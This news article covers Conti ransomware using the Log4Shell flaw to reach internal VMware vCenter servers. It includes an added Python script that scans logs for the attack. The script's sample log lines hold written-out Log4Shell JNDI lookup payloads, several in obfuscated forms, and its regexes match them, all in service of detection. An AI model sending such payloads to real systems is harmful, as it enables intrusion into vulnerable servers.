Conti ransomware found to be using Log4j to hack VMware vCenter servers


Conti ransomware was found to be using a critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.

https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement

It is only a matter of time before Conti, and possibly other groups, start using Log4j2 to its full potential. It is recommended that vulnerable systems be patched immediately and that the Log4j2 vulnerability be treated as a tool already in active use by ransomware groups.

Conti wasted no time in adopting this new attack method, and is the first “top-tier” threat group known to have weaponized the Log4j vulnerability.

Targeting vulnerable vCenter

On December 9, a proof-of-concept (PoC) exploit for CVE-2021-44228 (aka Log4Shell) was released.

A day later, mass scanning of the Internet began, and multiple threat groups started searching for vulnerable systems. The first to take advantage of this bug were cryptocurrency miners, botnets, and a new ransomware called “Khonsari”.

By December 15, the threat groups using Log4Shell had expanded to include nation-state hackers and initial access brokers who sell network access to ransomware groups.

On December 12, members of Conti, one of the largest ransomware gangs, showed interest in Log4Shell, judged that it could serve as a means of attack, and began looking for new targets.

AdvIntel, a company that tracks cybercrime and hostile activity, said the goal was to move laterally within the network to reach VMware vCenter.

Several dozen vendors have been affected by Log4Shell and are rushing to patch their products and provide workarounds and mitigations to their customers.

VMware is one such company, citing 40 vulnerable products.

The company has provided mitigations and fixes, but no patches for the affected vCenter versions are available yet.

vCenter Server is not normally exposed to the Internet, but an attacker who already has access to the internal network could still take advantage of this vulnerability.

Threat groups with network access to affected VMware products could exploit this issue to gain full control of the target system or to conduct a denial of service attack.

https://www.vmware.com/security/advisories/VMSA-2021-0028.html

According to AdvIntel, the Conti ransomware group was interested in leveraging Log4Shell with a publicly available exploit.

Log4Shell moves horizontally

The report notes that “this is the first time that this vulnerability has entered the attack methodology of a major ransomware group.”

This exploit led to multiple observed cases in which the Conti group tested whether the Log4j exploit could be put to practical use.

While many companies are focused on blocking Log4Shell attacks on devices exposed to the Internet, the Conti ransomware shows that this vulnerability can be exploited to target internal devices that have received little attention.

We have confirmed that the Conti ransomware cooperative group has already infiltrated the targeted network and exploited a vulnerable Log4j machine to access the vCenter server.

This means that members of the Conti ransomware have compromised the network with different initial access methods (RDP, VPN, email phishing) and are now using Log4Shell to move laterally across the network.
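The point above is that Log4Shell detection cannot stop at the perimeter: request logs of internal Java applications, including vCenter, deserve the same scrutiny as those of Internet-facing hosts. As an added example, not code from the article or from AdvIntel, the following Python scan runs over constructed log lines (the IP addresses, paths and header values are invented), unwinds the common obfuscation forms that hide the literal `jndi` token, and flags any lookup whose callback host is a private address, since a callback to an internal host is exactly what a lateral-movement attempt from an already-compromised machine looks like. The helper names (`normalize`, `find_jndi_lookups`, `callback_is_internal`) are assumptions of this example.

```python
import ipaddress
import re

# Constructed sample log lines (not taken from the article) in the shape an
# internal Java web application might write when a lookup string reaches a log call.
SAMPLE_LOGS = [
    '10.0.5.21 - [15/Dec/2021:10:02:11 +0000] "GET /ui/ HTTP/1.1" 200 UA="Mozilla/5.0"',
    '10.0.5.77 - [15/Dec/2021:10:02:13 +0000] "GET /ui/ HTTP/1.1" 200 UA="${jndi:ldap://10.0.5.77:1389/a}"',
    '10.0.5.77 - [15/Dec/2021:10:02:14 +0000] "GET /ui/ HTTP/1.1" 200 X-Api-Version="${${lower:J}ndi:rmi://10.0.5.77:1099/b}"',
    '10.0.5.77 - [15/Dec/2021:10:02:15 +0000] "GET /ui/ HTTP/1.1" 200 XFF="${${::-j}${::-n}${::-d}${::-i}:dns://10.0.5.77/c}"',
    '10.0.5.30 - [15/Dec/2021:10:03:00 +0000] "GET /ui/login HTTP/1.1" 302 UA="curl/7.68.0"',
]

# Innermost ${...} lookup: a body containing no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once obfuscation has been unwound, and the same with scheme/target captured.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_JNDI_TARGET = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s"]+)', re.IGNORECASE)


def _resolve_one(body: str) -> str:
    """Resolve one non-nested lookup body to the text Log4j would substitute.

    Only the substitutions used to hide the literal 'jndi' token are unwound:
    ${lower:X}, ${upper:X} and the default-value form ${name:-X} (which covers
    ${::-X}). Any other lookup is returned verbatim so that a genuine
    ${jndi:...} survives normalisation and can be matched afterwards.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    return "${" + body + "}"


def normalize(text: str, max_rounds: int = 16) -> str:
    """Unwind nested obfuscation lookups, innermost first, until the text is stable."""
    for _ in range(max_rounds):
        unwound = _INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if unwound == text:
            break
        text = unwound
    return text


def callback_is_internal(target: str) -> bool:
    """True when the callback host is a private, loopback or link-local IPv4/IPv6 literal.

    A trailing ':port' is stripped for IPv4 literals; hostnames yield False
    because this example does not resolve names.
    """
    host = target.rsplit(":", 1)[0] if target.count(":") == 1 else target
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def find_jndi_lookups(lines):
    """Return one finding per log line that carries a JNDI lookup after normalisation."""
    findings = []
    for number, line in enumerate(lines, start=1):
        norm = normalize(line)
        if not _JNDI.search(norm):
            continue
        finding = {"line": number, "scheme": None, "target": None,
                   "internal_callback": False, "raw": line}
        m = _JNDI_TARGET.search(norm)
        if m:
            finding["scheme"] = m.group(1).lower()
            finding["target"] = m.group(2)
            finding["internal_callback"] = callback_is_internal(m.group(2))
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_jndi_lookups(SAMPLE_LOGS):
        origin = "INTERNAL callback" if f["internal_callback"] else "external callback"
        print(f"line {f['line']}: {f['scheme']}://{f['target']} ({origin})")
```

Run against real application logs, a finding with an internal callback address should be escalated as possible lateral movement rather than as noise from Internet-wide scanning. String matching of this kind is a triage aid only: it misses encodings the normaliser does not unwind, and it does nothing about the underlying flaw, which is closed only by updating Log4j or applying the vendor's mitigation.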

Conti is a Russian-speaking group that has long been involved in ransomware activity as the successor to the famous Ryuk.

This group has carried out hundreds of attacks, and their data leak site lists over 600 affected companies that did not pay the ransom. In addition to this, some companies have paid the ransom to have their data decrypted.

Cybersecurity firm Group-IB estimates that about 30 percent of ransomware victims choose to pay the ransom and use the attacker’s decryption tool to restore their files.

Recently, the Australian Cyber Security Centre (ACSC) issued an alert on the Conti ransomware that targeted several organizations in the country. One of the victims is CS Energy, a power company.

Frontier Software, a provider of payroll software used by the Australian government, was also hit by Conti, resulting in the loss of data on tens of thousands of government employees.

More recently, McMenamins, a chain of breweries and hotels in the US states of Oregon (Portland) and Washington, has been affected.

The Conti ransomware has been operating under this name since June 2020, and according to information from AdvIntel, the group has extorted more than $150 million from victims in the past six months.
